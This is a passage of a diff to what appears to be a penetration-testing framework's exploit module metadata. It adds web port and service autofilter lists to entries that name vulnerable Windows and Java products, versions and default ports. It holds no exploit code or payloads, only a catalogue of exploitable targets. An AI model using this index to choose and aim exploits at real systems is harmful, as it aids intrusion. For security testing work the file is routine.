"targets": [ "HP OpenView Network Node Manager 7.53 w/NNM_01206", "Debug Target" @@ -81569,6 +105709,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HP OpenView Network Node Manager 7.50 / Windows 2000 All" ], @@ -81604,6 +105759,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HP OpenView Network Node Manager 7.53 w/NNM_01201", "HP OpenView Network Node Manager 7.53 (Windows 2003)", @@ -81639,6 +105809,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HP OpenView Network Node Manager 7.50 / Windows 2000 All" ], @@ -81675,6 +105860,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "HP OpenView Network Node Manager Release B.07.00", @@ -81714,6 +105914,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "HP OpenView Network Node Manager 7.53 w/NNM_01206", @@ -81754,6 +105969,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "HP OpenView Network Node Manager 7.53", @@ -81789,6 +106019,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Universal Windows Target" ], @@ -81824,6 +106069,21 @@ "platform": "Windows", "arch": "java", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HP ProCurve Manager 4.0 SNAC Server" ], @@ -81859,6 +106119,21 @@ "platform": "Windows", "arch": "java", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HP ProCurve Manager 4.0 SNAC Server" ], @@ -81894,6 +106169,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows XP SP3 / Win Server 2003 SP0" ], @@ -81927,6 +106217,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows 2000 SP4 English" ], @@ -81961,6 +106266,21 @@ "platform": "Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HP SiteScope 11.30 / Microsoft Windows 7 and higher", "HP SiteScope 11.30 / CMD" @@ -81997,6 +106317,21 @@ "platform": "Windows", "arch": "x86", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HP SiteScope 11.20 (with Operations Agent) / Windows 2003 SP2" ], @@ -82033,6 +106368,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "httpdx 1.4 - Windows XP SP3 English", "httpdx 1.4 - Windows 2003 SP2 English" @@ -82066,6 +106416,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting", "httpdx 1.4 - Windows XP SP3 English", @@ -82106,6 +106471,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "IA WebMail 3.x" ], @@ -82142,6 +106522,21 @@ "platform": "Windows", "arch": "", "rport": 9495, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Windows Server 2003 SP0", @@ -82179,6 +106574,21 @@ "platform": "Windows", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "TPMfOSD 5.1 (Windows 2000 SP4 - English)", "TPMfOSD 5.1 (Windows 2003 All - English)" @@ -82213,6 +106623,12 @@ "platform": "Windows", "arch": "", "rport": 1581, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "IBM Tivoli Storage Manager Express 5.3.3" ], @@ -82248,6 +106664,12 @@ "platform": "Windows", "arch": "", "rport": 8000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -82284,6 +106706,21 @@ "platform": "Windows", "arch": "", "rport": 18881, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting", "Integard Home 2.0.0.9021", @@ -82318,6 +106755,21 @@ "platform": "Windows", "arch": "", "rport": 57772, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows 2000 SP4 English" ], @@ -82352,6 +106804,12 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "v1.0 - XP / Win7" ], @@ -82385,6 +106843,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "WhatsUP Gold 8.03 Universal" ], @@ -82421,6 +106894,21 @@ "platform": "Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Jira 6.0.3 / Windows 2003 SP2" ], @@ -82455,6 +106943,21 @@ "platform": "Windows", "arch": "x86", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Kaseya VSA v7 to v9.1" ], @@ -82489,6 +106992,21 @@ "platform": "Windows", "arch": "x86", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Kaseya KServer / Windows" ], @@ -82525,6 +107043,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows XP sp3", "Windows Server 2003 sp2" @@ -82564,6 +107097,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "LANDesk Lenovo ThinkManagement Suite 9.0.2 / 9.0.3 / Microsoft Windows Server 2003 SP2" ], @@ -82598,6 +107146,21 @@ "platform": "Windows", "arch": "java", "rport": 9788, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Lexmark Markvision Enterprise 2.0" ], @@ -82633,6 +107196,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "MEHTTPS.exe Universal" ], @@ -82668,6 +107246,21 @@ "platform": "Java", "arch": "java", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "ManageEngine OpManager <= v11.6" ], @@ -82699,6 +107292,21 @@ "platform": "Windows", "arch": "x86, x64", "rport": 8181, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -82733,6 +107341,21 @@ "platform": "Windows", "arch": "x86, x64", "rport": 9090, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -82764,6 +107387,21 @@ "platform": "Windows", "arch": "", "rport": 9090, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -82796,6 +107434,21 @@ "platform": "Windows", "arch": "", "rport": 8020, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "ManageEngine Desktop Central 9 on Windows" ], @@ -82829,6 +107482,12 @@ "platform": "Windows", "arch": "", "rport": 9999, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "MaxDB 7.6.00.16", "MaxDB 7.6.00.27" @@ -82864,6 +107523,21 @@ "platform": "Windows", "arch": "", "rport": 9999, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "MaxDB 7.5.00.11 / 7.5.00.24", "Windows 2000 English", @@ -82905,6 +107579,12 @@ "platform": "Windows", "arch": "x86", "rport": 81, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "ePo 2.5.1 (Service Pack 1)", @@ -82940,6 +107620,12 @@ "platform": "Windows", "arch": "x86", "rport": 3000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal MDaemon.exe", "Debugging test" @@ -82975,6 +107661,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Windows 2000 SP0-SP3 English", @@ -83021,6 +107722,21 @@ "platform": "Windows", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "MiniWeb build 300 on Windows (Before Vista)" ], @@ -83054,6 +107770,12 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "NaviCOPA 2.0.1 Universal" ], @@ -83089,6 +107811,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "NetDecision 4.5.1 on XP SP3" ], @@ -83123,6 +107860,21 @@ "platform": "Windows", "arch": "x86", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "NETGEAR ProSafe Network Management System 300 / Windows" ], @@ -83156,6 +107908,21 @@ "platform": "Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Universal Windows Target" ], @@ -83191,6 +107958,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Novell Zenworks Mobile Device Management on Windows" ], @@ -83224,6 +108006,12 @@ "platform": "Windows", "arch": "", "rport": 8300, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Groupwise Messenger DClient.dll v10510.37" ], @@ -83257,6 +108045,21 @@ "platform": "Windows", "arch": "", "rport": 8800, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Now SMS/MMS Gateway v2007.06.27" ], @@ -83288,6 +108091,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows Powershell" ], @@ -83322,6 +108140,12 @@ "platform": "Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Oracle 9.2.0.1 Universal" ], @@ -83357,6 +108181,21 @@ "platform": "Windows", "arch": "", "rport": 7777, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Oracle Beehive 2" ], @@ -83390,6 +108229,21 @@ "platform": "Windows", "arch": "", "rport": 7777, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Oracle Beehive 2" ], @@ -83425,6 +108279,21 @@ "platform": "Java,Windows", "arch": "", "rport": 7001, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Oracle BTM 12.1.0.7 / Weblogic 12.1.1 with Samples Domain / Java", "Oracle BTM 12.1.0.7 / Windows 2003 SP2 through WMI" @@ -83462,6 +108331,21 @@ "platform": "Windows", "arch": "x64, x86", "rport": 7770, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Oracle Endeca Server 7.4.0 / Microsoft Windows 2008 R2 64 bits" ], @@ -83497,6 +108381,21 @@ "platform": "Windows", "arch": "x86", "rport": 9002, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Oracle Event Processing 11.1.1.7.0 / Windows 2003 SP2 through WMI" ], @@ -83530,6 +108429,21 @@ "platform": "Windows", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows Universal" ], @@ -83563,6 +108477,12 @@ "platform": "Windows", "arch": "", "rport": 7144, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows 2000 English SP0-SP4", @@ -83604,6 +108524,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows XP SP3 / Windows 2003 Server SP2 (No DEP) / PHP 5.4.2 Thread safe" ], @@ -83637,6 +108572,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows 2000 English SP0", "Windows 2000 English SP1", @@ -83677,6 +108627,12 @@ "platform": "Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows 2000 Pro SP0-4 English", @@ -83716,6 +108672,21 @@ "platform": "Windows", "arch": "", "rport": 8888, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "R4 v1.25" ], @@ -83751,6 +108722,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -83786,6 +108772,12 @@ "platform": "Windows", "arch": "x86", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows 2000", @@ -83822,6 +108814,21 @@ "platform": "Windows", "arch": "", "rport": 50000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows generic" ], @@ -83856,6 +108863,21 @@ "platform": "Windows", "arch": "", "rport": 1128, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "SAP NetWeaver 7.02 SP6 / Windows with WebClient enabled" ], @@ -83889,6 +108911,21 @@ "platform": "Windows", "arch": "", "rport": 9999, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "SAP DB 7.4 WebTools" ], @@ -83923,6 +108960,21 @@ "platform": "Windows", "arch": "x86", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Universal Savant.exe", "Windows 2000 Pro All - English", @@ -83962,6 +109014,21 @@ "platform": "Windows", "arch": "", "rport": 8443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -83997,6 +109064,21 @@ "platform": "Windows", "arch": "", "rport": 23423, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting" ], @@ -84032,6 +109114,12 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2003 SP2 English (NX)", "Windows 2000 SP4 and XP SP3 English (SEH)" @@ -84067,6 +109155,21 @@ "platform": "Windows", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Windows NT SP5/SP6a English", @@ -84107,6 +109210,12 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows NT English SP5-SP6", @@ -84153,6 +109262,21 @@ "platform": "Windows", "arch": "", "rport": 48080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Solarwinds Firewall Security Manager 6.6.5" ], @@ -84189,6 +109313,21 @@ "platform": "Windows", "arch": "", "rport": 9000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows Universal" ], @@ -84226,6 +109365,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Dell SonicWall Scrutinizer 9.5.1 or older" ], @@ -84261,6 +109415,12 @@ "platform": "Windows", "arch": "", "rport": 8000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 Pro English All", "Windows XP Pro SP0/SP1 English" @@ -84296,6 +109456,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "SimpleWebServer 2.2-rc2 / Windows XP SP3 / Windows 7 SP1" ], @@ -84329,6 +109504,21 @@ "platform": "Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Windows All - Sybase EAServer 5.2 - jdk 1.3.1_11", @@ -84367,6 +109557,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Sync Breeze Enterprise v9.4.28", @@ -84407,6 +109612,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows XP SP3 / Sysax Multi Server 5.64", "Windows 2003 SP1-SP2 / Sysax Multi Server 5.64" @@ -84443,6 +109663,21 @@ "platform": "Windows", "arch": "", "rport": 8090, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows 2000 English", "Windows XP English SP0/SP1", @@ -84479,6 +109714,21 @@ "platform": "Windows", "arch": "x86", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Numara / BMC Track-It! v9 to v11.X - Windows" ], @@ -84511,6 +109761,21 @@ "platform": "Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows 2000 - Trend Micro OfficeScan 7.3.0.1293)" ], @@ -84545,6 +109810,21 @@ "platform": "Windows", "arch": "x86, x64", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting", "OfficeScan 11", @@ -84583,6 +109863,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "v1.21 - Windows Server 2000", "v1.21 - Windows XP SP0", @@ -84621,6 +109916,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Umbraco CMS 4.7.0.378 / Microsoft Windows 7 Professional 32-bit SP1" ], @@ -84656,6 +109966,21 @@ "platform": "Windows", "arch": "x86", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "VMware vCenter Chargeback Manager 2.0.1 / Windows 2003 SP2" ], @@ -84687,6 +110012,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "VX Search Enterprise v9.5.12" ], @@ -84722,6 +110062,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows XP SP0", "Debug" @@ -84754,6 +110109,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -84789,6 +110159,12 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "xigui32.exe Universal", "xitami.exe Universal" @@ -84826,6 +110202,21 @@ "platform": "Java", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Java Universal" ], @@ -84862,6 +110253,21 @@ "platform": "Java,Linux,Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Java Universal", "Windows x86", @@ -84904,6 +110310,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Microsoft Windows Server 2003 R2 SP2 x86" ], @@ -84939,6 +110360,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -84974,6 +110410,12 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 English SP0-SP1" ], @@ -85009,6 +110451,12 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -85043,6 +110491,12 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 Pro English SP0", "Windows 2000 Pro English SP1-SP2" @@ -85079,6 +110533,12 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows NT 4.0 SP3", "Windows NT 4.0 SP4", @@ -85116,6 +110576,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows 2000 Pro English SP0" ], @@ -85150,6 +110625,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Brute Force" ], @@ -85185,6 +110675,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -85219,6 +110724,12 @@ "platform": "Windows", "arch": "", "rport": 143, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "WorldMail 3 Version 6.1.19.0", @@ -85255,6 +110766,12 @@ "platform": "Windows", "arch": "", "rport": 143, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP sp0 comctl32.dll" ], @@ -85288,6 +110805,12 @@ "platform": "Windows", "arch": "", "rport": 143, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 Pro SP4 English", "Windows 2003 SP0 English" @@ -85322,6 